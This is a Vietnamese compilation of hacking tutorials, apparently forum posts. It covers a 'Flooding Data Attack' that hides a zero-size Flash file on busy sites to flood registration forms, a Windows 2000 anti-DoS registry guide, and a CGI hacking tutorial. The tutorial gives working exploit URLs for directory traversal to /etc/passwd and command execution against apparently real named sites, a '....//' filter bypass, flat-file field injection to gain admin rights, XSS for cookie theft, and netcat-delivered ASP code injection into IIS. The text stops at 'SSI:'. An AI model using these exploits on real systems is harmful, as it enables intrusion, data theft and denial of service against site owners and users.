Flooding Data Attack ?
• Dạng 1.
Với kích thước từ 500 byte đến 1Kb các Hacker dễ dàng đính kèm vào một Website nào đó có nhiều người hiện đang có mặt truy cập trên Website đó.
Flooding Data Attack ?
•
với đọan mã trên ta có thể thấy Hacker đã đặt kích thước tập tin Flooddata.swf ở chế độ Chiều rộng (width) là bằng 0 và chiều cao (height) cũng bằng 0 như thế tập tin này sẽ không thể hiển thị được trên trên trang Web đó
Flooding Data Attack ?
Khi người sử dụng vào Website này lập tức sẽ kích họat chương trình Flood Data Attack ! của Hacker tại địa chỉ là http://noitancong.com/filedata.swf và Hacker cũng dễ dàng điều khiển chương trình bằng 1 file nguồn ở 1 Website nào đó của Hacker trên mạng mà Hacker đó đặt ra trong chương trình Flooding data Attack.
Flooding Data Attack ?
• Hacker có thể kiểm soát được số người hiện đang kích hoạt chương trình Flood data của mình trên Website đó và khi nào Hacker cảm thấy số lượng người đang kích hoạt chương trình đã đủ để việc tấn công một Website nào đó trên mạng thành công thì công việc đó có thể được bắt đầu.
Flooding Data Attack ?
• Ví dụ như hacker vào một địa chỉ như http://www.vbuleetin.com để thực hiện công việc tấn công trang này hacker cần phải tìm những nơi có sự trao đổi dữ liệu cho nhau như Register, Search, Login, Sendmail ….. Sau khi đã thu thập được những thành phần trên Hacker bắt đầu thực hiện lấy nhửng đầu vào(input) và gán nhửng giá trị đầu vào trên lên nơi điều khiển của chương trình Flood data attack!.
Flooding Data Attack ?
• Url=http://www.vbuleetin.com/register.php&username=user+random(999999999)&password=flood&passwordconfim=password&email=random(100000000)+@vbulleetin.com
Trong đó Url là giá trị của Website bị tấn công, Username với giá trị là một user nào đó do hacker đặt ra và cộng với biến ngẫu nhiên ở sau mỗi user mà hacker đặt ra là khác nhau.
Flooding Data Attack ?
• Một khi Website này bị tấn công, toàn bộ họat động của Server chứa Website đó sẽ bị hậu quả rất ngiêm trọng tùy theo số lượng người kích họat vào chương trình Flood data attack! Của hacker đó, Lúc này những phần bị ảnh hưởng sẽ là MailServer, MySQL, PHP, Apache, FTP….
Flooding Data Attack ?
• Đối với MySQL : Khi bị Flood data attack! Những yêu cầu sẽ được gửi liên tục đến Server và được chuyển qua MySQL xử lý với số lượng lớn và nối tiếp nhau cho đến khi quá tải chương trình MySQL sẽ hòan toàn bị vô tác dụng song song với việc ảnh hưởng đến MySQL là việc ảnh hưởng đến MailServer.
Flooding Data Attack ?
Với giá trị là random(100000000)+@vbuleetin.com thì khi thực thi nó sẽ gửi từ ‘1@vbuleetin.com’ cho đến ‘100000000@vbuleetin.com’ tất nhiên nhửng email này sẽ không có thực đối với trang chủ của Website ‘http://www. vbuleetin.com.
Flooding Data Attack ?
• Đối với sẽ nhửng địa chỉ email này MailServer đưa vào danh sách “Msgs Failed” nhưng với giá trị là @vbulletin.com thì hầu hết một nhà cung cấp “domain” và “hosting” sẽ chuyển về một số email mặc định như là postmaster, admin, administrator, supervisor, hostmaster, webmaster.
Flooding Data Attack ?
Những Hacker có thể lợi dụng những Form mail trong việc trao đổi thông tin giữa khách hàng với chủ cung cấp dịch vụ để thực hiện những cuộc tấn công, những cuốc tấn công này thường rất nguy hiễm vì có thể trong 1 giây Hacker thực hiện từ 100 lần đến hàng nghìn lần với những yêu cầu SendEmail từ 1 user trên server đó đến MailServer.
Flooding Data Attack ?
• Dạng 2: Được chạy dưới dạng file.exe với dạng thức này thì khả năng tấn công vẫn giống như cách tấn công nằm trên website nhưng khả năng tấn công được nâng thêm nhiều dạng như Ping, Flood Ftp, Flood Smtp… tùy vào khả năng phát triển của Hacker.
Flooding Data Attack ?
Cũng giống như chương trình Flood data attack! Được gắn trên website dạng .exe này cũng được điều khiển từ 1 Website. Thường thì nơi điều khiển được đặt chung 1 nơi để tiện cho việc điều khiển.
Flooding Data Attack ?
Với những phương thức tấn công như vậy ta cũng có thể thấy được tầm nguy hiểm của nó nếu như được đặt trên một server với số lượng người truy cập đông như Google hoặc 1 Website nổi tiếng nào đó thì sức phá hoại của nó là rất khủng khiếp.
Flooding Data Attack ?
• Với 1 client/1s có thể gửi từ 3 – 8 yêu cầu có thực đến máy chủ thực thi và xử lý thông qua đó nó có thể ảnh hưởng đến Php, Apache, Phpmail, MySQL, FTP …., Tùy theo những mã nguồn của ASP, PHP, JSP, CGI, PL hoặc chung quy là những mã nguồn có liên quan đến công việc xuất và nhập dữ liệu.
Flooding Data Attack ?
Nếu hacker huy động hoặc hack được những server hoặc Website nào đó có số lượng người Online khoảng 2000 thì trong 1 giây Server đó sẽ phải thực thi khoảng 6000 yêu cầu từ các client gửi đến Server đó.
Flooding Data Attack ?
Ví dụ : Có User nằm trên server X nào đó user đó có cài đặt mã nguồn mở như Forum IPB (Invision Power Boards) khi hacker sử dụng mục đăng ký làm nơi tấn công Flood data thì trong vòng một giây như phần trên đã nêu sẽ có khoãng 6000 nickname được khởi tạo đi kèm theo đó là 6000 yêu cầu đã được mã nguồn mử thiết lập khi đăng ký và sẽ kèm theo việc gửi email đến các địa chỉ đã đăng ký.
Flooding Data Attack ?
• Như vậy đi kèm với 6000 nickname trên, MailServer sẽ phải gửi đi 6000 yêu cầu trong vòng 1/s việc này nếu như bị kéo dài từ 5 – 10 phút thì Server đó hầu như sẽ không còn họat động được.
Flooding Data Attack ?
Bandwith lúc này có thể tăng 5 – 10 MB/s cộng thêm data khi được chuyển đến MySQL lúc này có thể đạt tới 5 -7 MB/s nữa khi đó toàn bộ các phần mềm như Apache, MailServer, PHP, MySQL, FTP đều bị ngưng họat động. Lúc đó server có thể sẽ bị reboot.
Flooding Data Attack ?
Vì Hacker sử dụng phương tiện tấn công Online trên Website và dựa vào lượng khách truy cập thông tin ở nhiều Website nên phương pháp này hầu như rất khó chống, mỗi ngày Hacker có thể dùng hàng ngàn địa chỉ IP trên khắp thế giới để thực hiện việc tấn công như thế ta có thể thấy nó đơn giản so với DDos rất nhiều nhưng sự nguy hiểm có lẽ hơn hẳn DDos.
Anti Flooding Data Attack ?
• Vì Flooding Data Attack tấn công theo dạng địa chỉ ‘http://victim.com/data.php&bien1&bien2&bien3’ theo cổng GET hoặc POST vì vậy, cho dù bất cứ lý do gì khi tấn công cũng phải đi qua hướng này.
Anti Flooding Data Attack ?
Do lỗi được xuất hiện ở các mã nguốn ASP hay PHP nên cách tốt nhất là sửa và xem lại những mã nguồn mà người sử dụng muốn đưa lên mạng.
Anti Flooding Data Attack ?
Để tránh bị Flood data Attack! Thì cách phòng chống tạm thời vẫn là thêm một chuỗi ngẫu nhiên trên mỗi Form có sự xuất và nhập dữ liệu tuy nhiên những cách trên chưa phải là những cách hòan thiện để chống lại nhửng cuộc tấn công tràn ngập dữ liệu (Flooding Data Attack).
In bài này | Gửi bài viết
Sưu tầm (Không rõ tên tác giả)
Giảm nguy cơ bị tấn công DoS cho Windows 2000 Server
Microsoft đưa ra một bài báo hướng dẫn 5 sửa đổi trong registry của Windows 2000 cho phép giảm khả năng bị tấn công từ chối dịch vụ (Denial of Service). Những chỉ dẫn này được áp dụng cho các hệ thống Win2k kết với mạng diện rộng (WAN) hoặc Internet hoặc những site yêu cầu an toàn thông tin đặc biệt.
Khi thay đổi các tham số này nhà quản trị site nên thận trọng, nên thay đổi các tham số này trên các hệ thống thử nghiệm trước để chắc chắn chúng hoạt động bình thường trước khi thay đổi trên hệ thống thực. Các tham số sai sẽ gây ảnh hưởng đến tất các các dịch vụ và ứng dụng của Win2K. Các tham số này đều nằm trong khoá: HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services.
Chống lại tấn công bằng cách làm lụt các gói SYN (SYN flooding actack)
Để hiểu về cách tấn công này, bạn phải hiểu tiến trình tạo một kết nối TCP/IP giữa hai hệ thống và cách mà các tin tặc lợi dụng để tạo nên một cuộc tấn công SYN flooding. Khi một hệ thống - gọi là hệ thống A - muốn tạo một kết nối tới hệ thống thứ hai - gọi là hệ thống B, hệ thống A sẽ gửi một gói tin SYN (cờ SYN trong phần header của gói tin TCP được bật) tới hệ thống B, hệ thống B nếu chấp nhận kết nối này thì nó sẽ gửi trả một gói SYN-ACK báo cho hệ thống A là nó chấp nhận kết nối, đến lúc này quá trình bắt tay đã hoàn tất một nửa (half open). Hệ thống A sau khi nhận được SYN-ACK thì trả lời bằng một gói ACK và kết nối đã được thiết lập. Tin tặc tấn công hệ thống B bằng cách gửi rất nhiều các gói SYN từ một địa chỉ IP thật hoặc địa chỉ IP giả yêu cầu thiết lập kết nối với hệ thống B nhưng không gửi gói ACK để hoàn tất kết nối, hệ thống B nếu không nhận được ACK của gói SYN-ACK thì sau một khoảng thời gian nhất định nó sẽ gửi lại gói SYN-ACK, tổng cộng có 5 lần gửi, khoảng thời gian chờ gói ACK từ hệ thống A trước khi gửi lại SYN-ACK được hệ thống B tăng lên, hành động này giúp cho các hệ thống có thể truyền tin qua một mạng chậm. Sau 5 lần gửi SYN-ACK, hệ thống B sẽ huỷ bỏ kết nối dang dở đó. Khoảng thời gian cần thiết để huỷ bỏ một kết nối như thế mất khoảng 3-4 phút, sau khi kết nối được huỷ bỏ, TCP chờ giải phóng cổng sẵn sàng cho kết nối mới mất thêm 3-5 phút nữa, tổng cộng hệ thống B mất 8 hoặc 9 phút cho một kết nối dang dở như thế. Do vậy nếu tin tặc gửi hàng loạt gói tin SYN mà không có gói tin ACK để hoàn thành kết nối, hệ thống B sẽ dễ dàng bị quá tải và không thể tiếp nhận được các kết nối TCP khác.
Windows 2000 kiểm soát nguy cơ bị tấn công SYN flooding bằng cách kiểm tra ba bộ đếm số cổng của TCP/IP, bao gồm số cổng đang kết nối dở dang (half open ports), số cổng đã hết thời gian chờ, số cổng đang thử gửi SYN-ACK. Khi ba giá trị này đến một ngưỡng nhất định, Win2k cho rằng nó bị tấn công DoS theo kiểu SYN flooding, và nó giảm thời gian chờ và số lần cố gắng gửi gói SYN-ACK nhằm mục đích giảm tải cho hệ thống. Cách xử sự của Win2k đối với tấn công SYN flooding tuỳ thuộc vào một giá trị có tên là SynAttackProtect:REG_DWORD, nằm trong khoá Tcpip\Parameters. Các giá trị mà SynAttackProtect nhận được là 0, 1, 2. Giá trị 0 (mặc định) chỉ định rằng TCP sẽ hoạt động bình thường. Giá trị 1 tăng mức độ bảo vệ cao hơn (giảm số lần cố gắng gửi lại gói SYN-ACK). Giá trị 2 là mức độ bảo vệ cao nhất, kết nối TCP sẽ kết thúc rất nhanh vì thời gian chờ cũng sẽ bị giảm đi. Lưu ý rằng với giá trị là 2 thì tuỳ chọn scalable windows và các tham số của TCP trên mỗi adapter (Initial RTT, window size) sẽ bị bỏ qua.
Chống lại sự chuyển hướng tới các gateway chết (Dead Gateway Redirect)
Khi thiết lập cấu hình cho card giao tiếp mạng (network adapter) bằng tay, bạn phải nhập địa chỉ TCP/IP, mặt nạ subnet, và gateway mặc định. TCP/IP sẽ gửi tất cả các gói có đích đến không cùng mạng con tới gateway này. Gateway có trách nhiệm dẫn đường các gói tin tới địa chỉ đích. Khi TCP/IP gửi gói tin đến gateway, gateway sẽ trả lời rằng nó đã tiếp nhận gói tin này. Nếu như gateway không hoạt động, nó sẽ không trả lời. Nếu TCP/IP không nhận được thông báo đã nhận từ 25% gói tin nó đã gửi, nó sẽ cho rằng gateway đã chết.
Để tránh trường hợp này, thường người ta thiết lập nhiều gateway, khi TCP/IP xác định rằng một gateway đã chết, nó sẽ chuyển sang sử dụng gateway tiếp theo trong danh sách. Cách cư xử của Win2k với gateway chết được quy định bởi một tham số là EnableDeadGWDetect:REG_DWORD nằm trong khoá Tcpip\Parameters với các giá trị là 0 (cấm) và 1 (cho phép). Microsoft khuyến cáo nên cấm Win2k nhận biết gateway chết, vì nó sẽ ngăn không cho TCP/IP gửi một gói tin đến một gateway không mong muốn khác mà tin tặc có thể lợi dụng để chặn các gói tin gửi ra ngoài mạng từ máy của bạn.
Để biết thêm chi tiết về các tham số khác, xin hãy tham khảo thêm tài liệu trên site của Microsoft: q315669
Tác giả: (Someone)
|
|
|
|
Tác giả: (Someone)
CGI hacking CGI hacking
Hiện nay các ứng dụng WEB dùng CGI rất nhiều,nó trở nên rất phổ biến và cũng được các hacker quan tâm và không ít các lổi bảo mật được tìm thấy .Bạn muốn hack web sữ dụng CGI thì bạn phải biết chút ít về ngôn ngữ PERL.Nếu bạn không biết gì về PERL thì tôi khuyên bạn nên đi tìm một cuốn sách nói về PERL mà đọc,điều này chắc là không khó đối với bạn.
Trước tiên ta hãy xem cách thức làm việt của GET và POST như thế nào:
GET:
GET là phương pháp mặt định để đệ trình các form,tuy là phương pháp mặt định nhưng có một vấn đề với việt sữ dụng GET.Phương pháp này thêm thông tin chứa trong form vào chuổi vấn tin URL(,nếu URL quá dài thì chương trình tự động xén bớt nên gây ra sự đệ trình không chính xác.Thông tin đực lấy từ biến môi trường $ENV{'QUERY_STRING'} ví dụ:
#script.cgi?sometext
#sẽ là:
$file = 'sometext'
$file = $ENV{'QUERY_STRING'};
#script.cgi?some&text
#sẽ là:
$name = 'some' and $file = 'text'
($name, $file) = split(/&/, $ENV{'QUERY_STRING'});
(chú ý:Tôi khuyên bạn biết chút ít về PERL cho dù bạn không lập trình bằng PERL,và điển hình là bài viết này bạn hiểu nó như thế nào ví dụ lệnh split() làm như thế nào...)
Và nếu nhiều biến thì như sau:
@pair = split(/&/, $ENV{'QUERY_STRING'});
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
#used to make + into spaces
$value =~ tr/+/ /;
#used to convert url encoding (hex) to ascii :
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $FORM{$name} = $value; #script.cgi?name=some&file=text
#sẽ là:
$FORM{'name'} = 'some' and $FORM{'file'} = 'text'
}
Trên đây là những ví dụ đơn giản về phương thức GET.và HTTP có dạng như sau:
GET /script.cgi?some&text HTTP/1.0
POST:
POST là phương pháp thư hai dùng để đẹ trình các form và đang đươc sữ dụng rộng rải nhất,vì nó không hạn chế lượng dữ liệu truyền đến server.Để đọc dữ liệu truyền đến server,trước tiên bạn phải xác định chiều dài của nó,và thực hiện điều này bằng cách qua iến môi trường CONTENT_LENGTH và sau đó bạn có thể đọc số byte chính xác trong một biến khác,chuổi được mã hoá bởi URL do đó bạn cần phân tích và giải mã nó.Đây là ví dụ của HTML được "submit" form với hai biến "name" và "file":
<form action="script.cgi" method="post">
<input type="text" name="name" value="">
<input type="hidden" name="file" value="profiles.txt">
<input type=submit value="submit">
</form>
Và tất cã các form dữ liệu sẽ được đặt trong:into $FORM{'name-of-field'} đọc POST data:
$buffer read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
#used to make + into spaces
$value =~ tr/+/ /;
#used to convert url encoding (hex) to ascii
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
#this would set
$FORM{'name'} = whatever the user put in the text field
#and $FORM{'file'} to profile.txt
$FORM{$name} = $value;
}
Làm việc của POST phần nào đó rất giống GET nhưng bạn sữ dụng hàm read() để đọc vào STDIN và nó sẽ send phần dữ liệu chứa trong phương thức POST.CONTENT _LENGTH dùng để gọi script để đọc dữ liệu,nó bao gồm trong phương thức POST.Một số script sữ dụng phưong thức này có dạng như sau:
<input type="hidden" name="file" value="profiles.txt">
-->đây là phần ẩn của mã nguồn URL mà khi hacker muốn xem thì không khó,khi anh phát hiện ra code có dạng như thế thì có thể đổi lại như sau:
<input type="hidden" name="file" value="/etc/passwd">
Và khi nhấn nút "submit" thì dữ liệu sẽ được phuơng thức POST gởi yêu cầu tới HTTP requery,vậy là bạn có được file passwd,thậm chí chỉ dùng telnet cũng lấy được.Đây là phương pháp dể dàng để lấy được dữ liệu quan trong của server qua vùng ẩn của html.Có nghĩa là bạn có thể bypass bất kỳ loại clien side security,chẵng hạn như java script check,http_referrer value,form html...Đừng bao giờ trông chờ vào dữ liệu đươc chuyển đến qua phương thức POST hơn nữa bạn sẽ có được dữ liệu từ GET,và nó sẽ thay đổi bởi attacker họ có thể đọc được dữ liệu của bạn từ HTTP RFC ví dụ dùng telnet:
POST /script.cgi HTTP/1.0
Content-Length: 23
Content-Type: application/x-www-form-urlencoded value=blah&another=bleh
POST và GET là hai phương thức giúp nhiều cho hacker khai thác thông tin của hệ thống và một modul quan trọng nữa là CGI cũng có lợi rất nhiều.
CGI:
CGI là một tiêu chuẩn để tạo các chương trình ngoại chẵng hạn như các script perl với một HTTP server,các thuật ngữ "common" và "gateway" ám chỉ các biến và quy ước thông thường được dùng để truyền thông tin này qua lại HTTP server.CGI cho phép bạn sữ dụng chương trình tuỳ biến này để định dạng và xữ lý dữ liệu xuất sang các bộ trình duyệt.Mổi lần người dùng yêu cầu một URL tương ứng với một Script CGI,WEB server viện dẩn chương trình,truyền dẩn thông tìn từ bộ trình duyệt đến script.Thông tin này bao gồm các header HTTP khác nhau và được gởi từ trình duyệt yêu cầu và thông tin từ được truyền cùng với URL chẵn hạn như thông tin chuổi query.Sau đó script CGI đọc và xữ lý đưa ra đáp ứng thích hợp với thông tin này :
xem ví dụ:
#$value is a new CGI
$value=CGI->new();
$file = $value->param('file');
#script.cgi?name=some&file=text
$name = $value->param('name');
#would make $name = 'some' and $file = 'text'
COOKIE:
Chắc tôi khỏi nói các bạn cũng biết.
ENV:
AUTH_TYPE:Kiểu xác thực dùng để hiệu lực hoá người dùng
CONTENT_LENGTH:Kích cở của nội dung file được cho ra
CONTENT_TYPE:Loại nội dung mà dữ liệu được gởi
CATEWAY_INTERFACE hiên bản CGI mà server hổ trợ
HTTP_ACCEPT:Loại MINE mà trình duyệt chấp nhận cho yêu cầu này
HTTP_USER_AGENT:Tên hoàn chỉnh bộ nhận dạng cảu bộ trình duyệt
PATH_INFO:Thông tin đường dẩn
PATH_TRANSLATEDATH_INFO được biên dịch
QUERY_STRING:Bất kỳ text sau '?'
REMOTE_ADDR:Địa chỉ IP của bộ trình duyệt yêu cầu
REMOTE_HOST:Máy chủ của bộ trình duyệt thực hiện yêu cầu
REQUEST_METHODhương pháp dùng đạt yêu cầu chẵn hạn GET hay POST
SCRIPT_NAME:Đường dẩn đến script được thực thi.
SERVER_NAME:Tên máy chủ của server.
SERVER_PORT:Cổng mà máy chủ liên lạc
SERVER_PROTOCOL:Giao thức và phiên bản được sữ dụng trong câu trã lời của server.
SERVER_SOLLTWARE:Tên và phiên bản phần mềm server.
Từ nảy đến giờ các bạn chỉ đọc toàn kiến thức cơ bản về giao thức truyền thông tin qua GET và POST với HTTP...Ta hãy đi đến phần quan trọng của ứng dụng lổi của script CGI trong việc hack.
Reverse Directory Transversal
Bây giờ hãy tận dụng các tổn thương của CGI nếu bạn biết UNIX và PERL thì tại sao không thể tìm ra lổ hổng của ứng dụng này,bây giờ ta hãy chú ý đến thuật ngữ:"Reverse Directory Transversal" làm chúng ta liên tưỡng đến dấu "../" tôi có thể nói rằng hầu hết các bạn ở đây đều biết tác dụng của dấu này chứ nên tôi không cần nói nhiều làm gì nữa mà ta hãy đặt ra câu hỏi tại sao lại sữ dụng dấu này?Vâng thưa các bạn tôi sẽ nói cho các bạn biết trong những dòng chữ tiếp theo sau.Dấu này nó cho phép chúng ta đoc,ghi,xoá và thi hành các file trên server bị tổn thương.Đây là cú pháp của hàm open()<!--emo& --><IMG alt=greensad.gif src="http://vnhacker.org/forum/html/emoticons/greensad.gif" border=0 valign="absmiddle"><!--endemo-->ví dụ)
open(FILE, "/home/user/file.txt");
or
$this = '/home/user/file.txt';
open(FILE, "$this");
Cã hai có chung một mục đích là mở file file.txt,chúng ta có thể thấy không có sơ hở nào cho việc tấn công từ xa của hacker.Và bây giờ chúng ta thữ nhìn đoạn code vuln.cgi sau:
$this = $ENV{'QUERY_STRING'};
#gets the user input into $this
open(FILE, "$this");
#opens that file
@stuff = <FILE>;
#puts contents of that file into @stuff array close(FILE);
print "Content-type: text/html\n\n";
#print html to the client print "<HTML><BODY>\n";
print @stuff;
print "</BODY></HTML>";
Các hacker sẽ làm việc với biến môi trường QUERY_STRING như sau:/etc/passwd và bất kỳ file nào để có thể đọc trên server.Nhưng một số server khác lại không như thế họ bảo mật hơn một tí ví dụ code như sau.
$this = '/home/user/';
(undef, $this) .= split(/?/, $ENV{'QUERY_STRING'});
open(File, "$this");
Bây giờ thì bạn không thể đọc với đầu vào là /etc/passwd nhưng ko vì thế mà các hacker đầu hàng họ nghĩ ngay ra dùng dấu ../ như sau:../../etc/passwd và họ đã thành công ví dụ trong một số ứng dụng CGI có đoạn URL sau:script.cgi?file=database.txt nhưng hacker đã tận dụng và khai thác như sau:script.cgi?file=../../../../etc/passwd
Ví dụ file mà tôi tìm thấy lổi này(chưa fix):
<A href="http://www.chattanooga.net/index.cgi?menu=Support&page=/../../../../../../../../etc/passwd" target=_blank><FONT color=#abb2d5>http://www.chattanooga.net/index.cgi?menu=..../../etc/passwd
Ta còn có thể khai thác các lệnh UNIX trên server này nữa ví dụ:
<A href="http://www.chattanooga.net/index.cgi?menu=Support&page=/../../../../../../../../bin/ls|" target=_blank><FONT color=#abb2d5>http://www.chattanooga.net/index.cgi?menu=...../bin/ls|
>>Xem các file và thư mục trên hệ thống và các bạn có thể thi hành các lệnh UNIX trên server này.
Đây là code để bảo vệ việc dùng dấu '../' như sau:
$this = '/home/user/';
(undef, $this) .= split(/?/, $ENV{'QUERY_STRING'});
$this = s/\.\.\///g;
#gets rid of ../ in $this
open(File, "$this");
Thoạt đàu nhìn thì có vẽ an toàn,nhưng chúng ta biết về cách mà UNIX và PERL hiểu như thế nào,hãy nhìn đây,đó là .\./.\./etc/passwd =>Trong UNIX sữ dụng '.\./' thay cho '../' nhưng các hacker đâu chịu yên họ sữ dụng để làm đầu vào như sau:'.\./.\./' thì file bảo vệ đó sẽ không nhìn thấy '../' tương đương '....//' và các string sẽ không được lọc hết,và bây giờ các hacker có thể đọc thi hành và xoá các file trên hệ thống ví dụ điển hình về lổi này là:
FileSeek.cgi
file này có đoạn code như sau:
=====================
$ROOT_DIR = '/web/guide/cgi-perl/private_09832ujd/CD-ROM/';
$DD = substr($ROOT_DIR, -1); # $DD = '/'
...
if ($directory =~ /$DD\.\./) { $directory = '' }
$ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;
$ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;
=====================
Rất dễ để đánh lừa FileSeek.cgi! Nếu attacker gởi "....//", FileSeek.cgi sẽ strip "../" và kết quả sẽ ra là "../".exploit như sau:
<A href="http://www.cgi-perl.com/programs/FileSeek/Demo/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd" target=_blank><FONT color=#abb2d5>http://www.cgi-perl.com/programs/FileSeek/......//etc/passwd
Vâng tới đây là bạn có thể hiểu rồi chứ.
Flat Databases:
Khi bạn nghe nói về flat Databases có nghĩa là dùng plain text để chứa dữ liệu đây có thể là database.txt,database or file.db.Bây giờ chúng ta hãy xem một ví dụ về FD(Flat Databases)
Hãy xem đoạn code sau:
use CGI;
#$input is a new cgi
$input=CGI->new();
#get GET/POST variables
$name = $input->param('name');
$mail = $input>param('mail');
$message = $input->param('message');
#print to messages database
open(DB, ">>messages.txt");
print DB "$name|$mail|$message\n"; close(DB);
Có ba vùng dũ liệu để input vào messages.txt,khi message board script đọc thì bạn sẽ nhìn thấy code sau:
#read messages database
open(DB, "<messages.txt");
@messages = <DB>;
close(DB);
#print html print "Content-type: text/html\n\n";
print "<HTML><BODY>\n";
#loop through all the messages
foreach $msg (@messages)
{
#split the database fields up
($name, $mail, $message) = split(/\|/, $msg);
print "message by: <a href="mailto:$mail">$name</a>\n"; print "<br><br>\n$message\n<br><br>\n";
}
print "</BODY></HTML>";
Không có sự lọc dữ liệu dầu vào nào đối với code này.nên bạn có thể dùng như sau để làm tràn:
flood|flood|flood\nflood|flood|flood\nflood|flood|flood\nflood|flood|flood\n ...thật nhiều vào
Với đoạn code trên ta không nhìn thấy sự đe doạ lớn nào đến với hệ thống nhưng hãy nhìn một số server code ẩu và có dạng như sau:dữ liệu vào:'username|password|visits|user-agent|admin|ipaddress' vùng admin là 1 nếu user là admin và 0 nếu là user bình thường.Vậy hãy nhìn khi chúng ta cho dữ liệu đầu vào như sau:
b0iler|a|1|linux|1|127.0.0.1|
OK tương đương user name là b0iler,visit là 1,user-agent là linux,*admin to 1*,ipaddress là 127.0.0.1 với lổi này một user bình thường có thể login vào hệ thống với quyền root,thông thường thì trường user name và pass thì được lọc nhưng với user-agent và referer thì không được lọc và các hacker có thể chèn những đoạn mã lệnh nguy hiểm vào hệ thống server bị tổn thương.
Cross Site scripting:
XSS thì các bạn nghe đến nhiều rồi nhất là bài viết của MASK.. rất rỏ nên tôi không muốn viết lại nữa,nhưng ỡ đây tôi đang viêt về lổ hổng của CGI nhưng CGI cũng bị lổi về XSS nên tôi nói sơ qua vậy mong các baạnthông cảm,xem ví dụ:
<A href="http://vuln.com/script.cgi?display=< script" target=_blank><FONT color=#abb2d5>http://vuln.com/script.cgi?display=< script type=text/javascript>alert('hello');< /script>
script.cgi là code perl mà nó dùng để xem dữ liệu trong vùng input và sẽ trã về clien side trên trìhn duyệt,và có nghĩa là đoạn code < script type=text/javascript>alert('hello');< /script> sẽ được chạy ngay trên trình duyệt của bạn.Và với những code js mà bạn biết bạn có thể khai thác một cách hiệu quả điển hình nhất là lấy cookie(bánh quy) và hơn nữa là có thể truy cập vào các URL chứa user name,passwd,sessionid và một số thông tin nhạy cảm nhất.Bạn có thể thay đổi user trên site đó và bạn cũng có thể submit data đê script thi hành gây những tổn hại đến server như del email,thay đổi email,send email,add admin vào database và bất cứ thứ gì bạn muốn khi bạn truy cập vào hệ thống với quyền tối cao.Đây là một đoạn code CGI có vấn đề:
use CGI;
#$input is a new CGI
$input=CGI->new();
$email = $input->param('email');
#checks for valid email address: something@something.com
if($email !~ /^(\S+)\@(\S+).(\S+)/)
{
#prints $email to html, totally unfiltered.
&printhtml("error: $email is not a valid email address");
}
else
{
&processemail("$email");
}
Bạn có thể đưa thông tin ví dụ < script type=text/javascript> alert(hello);< /script> vào email address một error message sẽ được gởi tới clien và đoạn mã js sẽ được chạy ngay trên trình duyệt của hacker.Và ví dụ về những lổi này thì tôi không cần đưa lên đây vì trong box bảo mật có rất nhiều lổi nói về XSS bạn có thể tìm và khai thác chúng =>tăng thêm kỹ năng hack của bạn.
Và tôi nói thêm trong việc chèn code js trong viêc tấn công qua cổng 80 xem ví dụ một số cách tấn công sau:
Thữ chèn một đoạn mã JS vào "Referer":
C:\>nc 127.0.0.3 80
HEAD / HTTP/1.0
Referer: < script>alert('document.domain='+document.domain)< /script>
HTTPd Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: <A href="http://127.0.0.3/Default.htm" target=_blank><FONT color=#abb2d5>http://127.0.0.3/Default.htm
Content-Type: text/html
Content-Length: 4325
Chèn vào default.asp:
C:\> nc 127.0.0.3 80
HEAD /default< script>alert("Cheers world!")< /script>.asp HTTP/1.0
#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2002-06-17 16:26:50
#Fields: time c-ip cs-method cs-uri-stem sc-status
16:26:50 127.0.0.3 HEAD /Default.htm 200
16:27:04 127.0.0.3 HEAD /default< script>alert("Cheers world!")< /script>.asp 200
16:41:15 127.0.0.3 GET /default.asp 200
Những script mà attacker có thể sữ dung:
HEAD< script SRC="c:\boot.ini">< /script> / HTTP/1.0
HEAD /default.asp<FileSystemObject.CopyFile "c:\boot.ini", "boot.htm"> HTTP/1.0
GET /< script>window.location="http://www.bad.com/bad.htm";< /script>home.htm HTTP/1.0
GET /default.asp<%FSObj.CopyFile global.asa global.txt%>
Tiếp tục:
C:\>nc 127.0.0.3 80
HEAD /Default.asp HTTP/1.0
User-Agent: <% Set fs = CreateObject("Scripting.FileSystemObject")
Referer: Set a = fs.CreateTextFile("c:\testfile.txt", True)
C:\>nc 127.0.0.3 80
HEAD /Default.asp HTTP/1.0
User-Agent: a.WriteLine("Here an attacker would")
Referer: a.WriteLine("build a file o-n the HTTPd")
C:\>nc 127.0.0.3 80
HEAD /Default.asp HTTP/1.0
User-Agent: a.WriteLine("of any type and content, including")
Referer: a.WriteLine("a binary, a script, a batch file...")
C:\>nc 127.0.0.3 80
HEAD /Default.asp HTTP/1.0
User-Agent: a.Close %>
Và:
C:>\nc 127.0.0.3 80 HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: <A href="http://127.0.0.3/Default.htm" target=_blank><FONT color=#abb2d5>http://127.0.0.3/Default.htm
Content-Type: text/html
Accept-Ranges: bytes
Content-Length: 4325
C:>\nc 127.0.0.3 80
HEAD /default.asp<img src="file:/C:/boot.ini">
HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: <A href="http://127.0.0.3/Default.htm" target=_blank><FONT color=#abb2d5>http://127.0.0.3/Default.htm
Content-Type: text/html
Accept-Ranges: bytes
Content-Length: 4325
C:>\nc 127.0.0.3 80
HEAD /default.asp< script>alert("Cheers world!")< /script>
HTTP/1.0 HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: <A href="http://127.0.0.3/Default.htm" target=_blank><FONT color=#abb2d5>http://127.0.0.3/Default.htm
Content-Type: text/html
Accept-Ranges: bytes
Content-Length: 4325
Chú ý:những đoạn code trên là ví dụ bạn phải linh hoạt trong qúa trình xâm nhập của mình
SSI:
